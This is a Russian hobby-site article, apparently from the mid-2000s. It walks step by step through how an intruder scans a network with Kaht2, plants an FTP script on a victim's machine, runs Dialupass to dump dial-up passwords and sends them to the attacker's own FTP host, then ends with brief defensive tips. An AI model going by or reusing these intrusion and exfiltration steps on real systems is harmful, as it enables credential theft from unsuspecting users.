На главную страницу                                               HomeStudio2004 

Главная          ДизайН                    СетЬ                         ГостеваЯ                   СсылкИ                  О СебЕ

Photoshop

Примеры

Мои работы

Сетевые соединения

Соединение напрямую двух компьютеров

Соединение двух компьютеров через модем

Обжим кабеля

Защита от кибер - преступника

-назад-      

Как кибер-преступник может завладеть Вашими паролями.

Для этого ему необходимо специальное программное обеспечение. Чтобы просканировать сеть и в дальнейшем оказаться на Вашей машине злоумышленник  воспользуется программой Kаht2. Для того, чтобы просмотреть Ваш Dilaup, он  воспользуется программой Dilаpаss2. Чтобы перекидывать файлы со своей машины на Вашу и наоборот, преступник воспользуется FТP сервером, который соединяется к 21 порту, который  так и называется «FТP порт», то есть порт для передачи данных.

Прежде чем хакер этим всем воспользуется, ему необходимо все программы настроить, в первую очередь для удобства и быстроты действия, чтобы как можно меньше потратить времени на достижение коварной цели. На машине взломщика создается отдельная папка (допустим с именем X), в которой и будет храниться всё необходимое. Запускается программа FТP сервер, там производятся следующие настройки:

1.

Создаётся имя пользователя (в этом примере будет xXx), которое в дальнейшем будет использоваться в роли клиента (жертвы) того компьютера, к которому подключится хакер (1), на этом же этапе указывается путь к папке "X". Но указать или исправить путь к папке можно позднее (3).
2. Указывается пароль (2) (в этом примере "1").
3. Сохраняется (4).
4. Запускается (5).

После того, как настроен FТP сервер, хакер изменяет названия других программ, это делается для того, что бы как можно быстрее набирать последующие команды. Так допустим программу "Dilаpаss2.exe" он хитро переименовывает в "d.exe" и перемещает в папку, которую он указал в настройках FТP сервера, программу  "Kаht2.exe" переименовывает в "k.exe" и помещает в папку "System32" на своей машине. Программы он может переименовать и в другие имена.

Далее злоумышленник подключается к глобальной паутине. После того, как он подключится, ему присваивается IP. Теперь он подключается к своему FТP серверу для того, чтобы активизировать работу FТP сервера и открыть 21 порт. Как он это делает:

Запускает  программу передачи файлов FТP. Это он делает с помощью консоли  "пуск/выполнить/ftp"

1.

Запускает  программу передачи файлов FТP. Это он делает с помощью консоли  "пуск/выполнить/ftp"
2. У него открывается командная строка FТP, в которой он пишет ряд команд, таких как: open xxx.xxx.xxx.xxx, где xxx.xxx.xxx.xxx - IP машины хакера.
3. Далее он пишет логин и пароль, которые он создал при настройке FТP сервера. Если все он сделает правильно, то выглядит это так:

А в FТP сервере, в разделе Server Log, хакер видит следующее:

Дальше он переходит непосредственно к сканированию сети. Для этого хакер пользуется программой "kаHt2". Запускает её с помощью консоли: "пуск/выполнить/cmd". Далее, в появившейся командной строке набирает k (имя, в которое хакер переименовал  kаHt2.exe) и нажимает Enter. Если программа запущена, то он видит перед собой  это:

Набирает команду, приведенную ниже:

где "k" - название сканера;  

"x.x.100.100 x.x.100.200" - интервал сканирования. Обычно сканирует тот интервал, к которому он сам принадлежит. Даже если потребовалось потратить больше времени, чем ему хотелось, рано или поздно результат будет, а видно это из рисунка ниже:

 Далее хакер пишет команду, для того, что бы на машине жертвы оставить файл, в котором будет находиться инструкции  для ftp. Команда выглядит следующим образом:

echo – команда ftp, создающая файл на машине жертвы;

open x.x.100.138 – открытие FТP сервера на машине злоумышленника;

xXx логин;

1 – пароль;

v – имя файла, в котором будут храниться команды.

 

Затем он запускает на машине жертвы ftp-консоль с определёнными параметрами и открывает файл, оставленный им раньше. Таким образом, он соединяется 21 портом, передачи данных, свою машину с машиной жертвы и забирает с FТP сервера программу для просмотра Dilаup. Выглядит это следующим образом:

ftps:v – открытие ftp с инструкцией;

get  - прием файла.

Для того, чтобы хакер знал, успешна ли произошла закачка, он смотрит FТP сервер, в разделе Server Log. Если закачка прошла успешна, он видит следующее: 

после чего злоумышленник закрывает ftp командой  bye.

Далее он запускает закаченную программу на машине жертвы и результат сохраняет в определённом файле. Команда выглядит следующим образом: 

d.exe – программа;

/allusers – просмотр всех пользователей;

/shtml – в html формате;

c:\windows\system32\d.html” – каталог, в котором будет сохранен файл и название самого файла.

 

Теперь ему необходимо закачать результат на свою машину, делает он это следующим образом:

ftps:v – открытие ftp с инструкцией;

send  - отправка файла.

Смотрит  FТP сервер, в разделе Server Log. Если отправка прошла успешна, он видит следующее:

после чего злоумышленник закрывает ftp командой  bye.

Теперь злоумышленнику необходимо убрать следы с машины жертвы, делает он это следующим образом: 

Вот и всё.  Злоумышленник получил Ваши пароли, просмотреть которые он может у себя в той папке, которую он указал в настройках FТP сервера.

Теперь о защите: В первую очередь необходимо у себя на системе установить программу Firewall. Эта программа показывает входящие и исходящие пакеты данных. Что касается выбора Firewallа, то это уже на Ваше усмотрение. Также необходимо установить какой-нибудь антивирус и желательно обновлять его почаще. Ну а самое главное, если всё же к Вам проник злоумышленник, так как на любую защиту есть обход её, для того, чтобы он не смог завладеть Вашим паролем доступа в Internet - НЕ СОХРАНЯТЬ пароль в автодозвоне.

Есть еще один способ узнать, проник ли к Вам на машину хакер или нет. Но это больше похоже на параною :) , но бывает и помогает. Открыть папку System32, упорядочить файлы по дате создания/изменения, причем так, чтобы новые файлы были первыми. В общем будет сразу заметно если кто-то у Вас сидит. Главное почаще туда заглядывать.

И еще на последок. Всё что описано выше, Вы можете опробовать на себе, только для того, чтобы проверить свою защиту. Это можно сделать не выходя в Интернет. Можно создать сетевое соединение с помощью сетевых плат и сетевого кабеля или через модем.

Если у Вас возникли какие-либо вопросы, присылайте мне на e-mail.

 

-ГлавнаЯ-  ::  -ДизайН-  ::  -СетЬ-  ::  -ГостеваЯ-  ::  -СсылкИ-  ::  -О себЕ-

Что Вы думаете об этом сайте? Ve_ter_OK@mail.ru

Hosted by uCoz

 

Hosted by uCoz
Hosted by uCoz